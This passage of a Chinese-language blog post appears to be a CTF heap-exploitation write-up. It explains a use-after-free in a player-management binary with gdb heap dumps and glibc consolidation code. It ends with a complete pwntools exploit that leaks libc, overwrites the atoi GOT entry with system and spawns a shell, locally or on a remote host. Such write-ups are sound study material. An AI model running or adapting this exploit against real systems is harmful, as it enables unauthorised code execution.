class="line">0x604160:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604170:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604180:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604190:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041a0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041b0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041c0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041d0:	0x00000000000000b0	0x0000000000000020 &lt;-- player 3 [free]</span><br><span class="line">0x6041e0:	0x0000000000000000	0x0000000400000003</span><br><span class="line">0x6041f0:	0x0000000000604200	0x0000000000020e11 &lt;-- top chunk</span><br><span class="line"></span><br><span class="line">Malloc不喜欢碎片，所以它做的是整合任何相邻的空闲块，根据它们的合并大小更新这些块的大小值，</span><br><span class="line">最后将顶块的大小值更新为更高的块，因为块是free的，并且意味着要分配更多的可用空间。</span><br><span class="line"></span><br><span class="line">(0x20)     fastbin[0]: 0x6041d0 --&gt; 0x0</span><br><span class="line">(0x30)     fastbin[1]: 0x0</span><br><span class="line">(0x40)     fastbin[2]: 0x0</span><br><span class="line">(0x50)     fastbin[3]: 0x0</span><br><span class="line">(0x60)     fastbin[4]: 0x0</span><br><span class="line">(0x70)     fastbin[5]: 0x0</span><br><span class="line">(0x80)     fastbin[6]: 0x0</span><br><span class="line">                  top: 0x6041f0 (size : 0x20e10) </span><br><span class="line">       last_remainder: 0x0 (size : 0x0) </span><br><span class="line">            unsortbin: 0x604120 (size : 0xb0)</span><br><span class="line"></span><br><span class="line">  这个地方不是很懂，感觉就是扩大了top chunk的size，可是有什么用</span><br><span class="line"></span><br><span class="line">现在考虑以下内容。下次分配会发生什么？</span><br><span class="line"></span><br><span class="line">请记住，每个player对象的默认大小为0x20，指针指向任意大小的块，具体取决于输入的长度。</span><br><span class="line"></span><br><span class="line">当我们分配一个新块时，malloc将根据大小请求检查相应的bin列表，并检查是否有相同大小的等效空闲块以回馈给用户。这就是所谓的首次适应行为。请记住，快速列表中的删除和添加发生在列表的HEAD中。换句话说，我们应该期待玩家的信息被存储，0x6041d0因为它是一个free的fastbin大小并满足0x20要求。</span><br><span class="line"></span><br><span class="line">未分类的bin保存地址0x604120。这是玩家2的大块地址。这与free（3）之前的地址不同。那是因为malloc整合了相邻的空闲块，并且它们变成了一个完整的空闲块，因此它必须更新地址。与邻接检查对应的代码如下：</span><br><span class="line"></span><br><span class="line">/ *向后巩固* /</span><br><span class="line"> <span class="keyword">if</span>（！prev_inuse（p））&#123;</span><br><span class="line">      prevsize = p-&gt; prev_size ;</span><br><span class="line">      size + = prevsize;</span><br><span class="line">      p = chunk_at_offset（p， - （（long）prevsize））;</span><br><span class="line">      unlink（av，p，bck，fwd）;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">前面free了player2，3的地址，然后被malloc整合成一个大的chunk</span><br><span class="line"></span><br><span class="line">无论我们输入的名称大小（只要它不大于当前未分类的bin列表中的块，0xb0在我们的例子中），我们应该返回地址0x604120以存储名称。如果大小小于0xb0，那么给定的块将被分割，因为没有必要回馈超过我们要求的数量，对吧？</span><br><span class="line"></span><br><span class="line">但是，0x604120是player2的大块地址！这意味着，我们可以使用的名称有效载荷覆盖其数据并混淆其结构。请记住，player2仍然在选定的变量中，因此我们仍然可以打印其内容，编辑它等。如果我们能够使用我们选择的指针（GOT条目）覆盖指向原始名称的指针并调用edit它的功能呢？我们可以重定向代码执行。这是一个abritrary写原语！</span><br><span class="line"></span><br><span class="line"><span class="comment"># Overwrite 3rd player's (index 2) name pointer with atoi</span></span><br><span class="line"><span class="comment"># in order to edit it with system's address</span></span><br><span class="line">alloc(<span class="string">'Z'</span>*8 * 2 + p64(atoi_got))</span><br><span class="line"></span><br><span class="line">edit(p64(system))</span><br><span class="line"></span><br><span class="line">我选择覆盖的函数的GOT条目是atoi。这背后的原因是atoi接收指向我们输入的指针，</span><br><span class="line">以便将其转换回整数。如果atoi是system有关系吗？如果我们提供sh它应该是什么的论据，会发生什么</span><br><span class="line"></span><br><span class="line">0x604120:	0x0000000000000000	0x0000000000000021 &lt;-- new player<span class="string">'s name [old player 2]</span></span><br><span class="line"><span class="string">0x604130:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a</span></span><br><span class="line"><span class="string">0x604140:	0x0000000000603110	0x0000000000000091</span></span><br><span class="line"><span class="string">0x604150:	0x00007ffff7dd37b8	0x00007ffff7dd37b8</span></span><br><span class="line"><span class="string">0x604160:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x604170:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x604180:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x604190:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x6041a0:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x6041b0:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x6041c0:	0x4343434343434343	0x4343434343434343</span></span><br><span class="line"><span class="string">0x6041d0:	0x0000000000000090	0x0000000000000020 &lt;-- new allocated player</span></span><br><span class="line"><span class="string">0x6041e0:	0x0000000200000001	0x0000000400000003</span></span><br><span class="line"><span class="string">0x6041f0:	0x0000000000604130</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">player2的地址已经被atoi的got表所覆盖</span></span><br><span class="line"><span class="string">一旦我们请求编辑其名称，我们将覆盖atoi'</span>s带system<span class="string">'s地址的条目。getshell！</span></span><br></pre></td></tr></table></figure>

<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">atoi_got = 0x603110</span><br><span class="line"></span><br><span class="line">def alloc(name, attack = 1, </span><br><span class="line">		  defense = 2, speed = 3, precision = 4):</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'name: '</span>)</span><br><span class="line">	p.sendline(name)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'points: '</span>)</span><br><span class="line">	p.sendline(str(attack))</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'points: '</span>)</span><br><span class="line">	p.sendline(str(defense))</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'speed: '</span>)</span><br><span class="line">	p.sendline(str(speed))</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'precision: '</span>)</span><br><span class="line">	p.sendline(str(precision))</span><br><span class="line"></span><br><span class="line">	<span class="built_in">return</span></span><br><span class="line"></span><br><span class="line">def edit(name):</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'name: '</span>)</span><br><span class="line">	p.sendline(name)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'sh'</span>)</span><br><span class="line"></span><br><span class="line">	<span class="built_in">return</span></span><br><span class="line"></span><br><span class="line">def select(idx):</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'index: '</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">	<span class="built_in">return</span></span><br><span class="line"></span><br><span class="line">def free(idx):</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'index: '</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">	<span class="built_in">return</span></span><br><span class="line"></span><br><span class="line">def show():</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line"></span><br><span class="line">	<span class="built_in">return</span></span><br><span class="line"></span><br><span class="line">def pwn():</span><br><span class="line"></span><br><span class="line">	alloc(<span class="string">'A'</span>*0x60)</span><br><span class="line">	alloc(<span class="string">'B'</span>*0x60)</span><br><span class="line">	alloc(<span class="string">'C'</span>*0x80)</span><br><span class="line">	alloc(<span class="string">'D'</span>*0x80)</span><br><span class="line"></span><br><span class="line">	select(2)</span><br><span class="line"></span><br><span class="line">	free(2)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># The 'selected' array contains the 3rd player object</span></span><br><span class="line">	<span class="comment"># We are abusing the UAF vuln to leak libc</span></span><br><span class="line">	<span class="comment"># show_player just checks if the 'selected' array is empty</span></span><br><span class="line">	<span class="comment"># if it's not, it will print the value of the player's object</span></span><br><span class="line">	<span class="comment"># without checking if it's actually free'd or not</span></span><br><span class="line">	show()</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Name: '</span>)</span><br><span class="line"></span><br><span class="line">	leak        = u64(p.recv(6).ljust(8, <span class="string">'\x00'</span>))</span><br><span class="line">	libc        = leak - 0x3c17b8</span><br><span class="line">	system      = libc + 0x46590</span><br><span class="line"></span><br><span class="line">	log.info(<span class="string">"Leak:   0x&#123;:x&#125;"</span>.format(leak))</span><br><span class="line">	log.info(<span class="string">"Libc:   0x&#123;:x&#125;"</span>.format(libc))</span><br><span class="line">	log.info(<span class="string">"system: 0x&#123;:x&#125;"</span>.format(system))</span><br><span class="line"></span><br><span class="line">	log.info(<span class="string">"Overwriting atoi with system"</span>)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># Consolidate with top chunk</span></span><br><span class="line">	free(3) </span><br><span class="line"></span><br><span class="line">	<span class="comment"># Overwrite 3rd player's (index 2) name pointer with atoi</span></span><br><span class="line">	<span class="comment"># in order to edit it with system's address</span></span><br><span class="line">	alloc(<span class="string">'Z'</span>*8 * 2 + p64(atoi_got))</span><br><span class="line"></span><br><span class="line">	edit(p64(system))</span><br><span class="line"></span><br><span class="line">	p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    log.info(<span class="string">"For remote: %s HOST PORT"</span> % sys.argv[0])</span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) &gt; 1:</span><br><span class="line">        p = remote(sys.argv[1], int(sys.argv[2]))</span><br><span class="line">        pwn()</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p = process(<span class="string">'./main.elf'</span>)</span><br><span class="line">        pause()</span><br><span class="line">        pwn()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/07/double free/" rel="next" title="Double free">
                <i class="fa fa-chevron-left"></i> Double free
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/08/堆入坑指南/" rel="prev" title="堆入坑指南">
                堆入坑指南 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">xfgg</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-寻找漏洞"><span class="nav-number">1.</span> <span class="nav-text">0x01 寻找漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-思路分析"><span class="nav-number">2.</span> <span class="nav-text">0x02 思路分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">3.</span> <span class="nav-text">exp</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xfgg</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
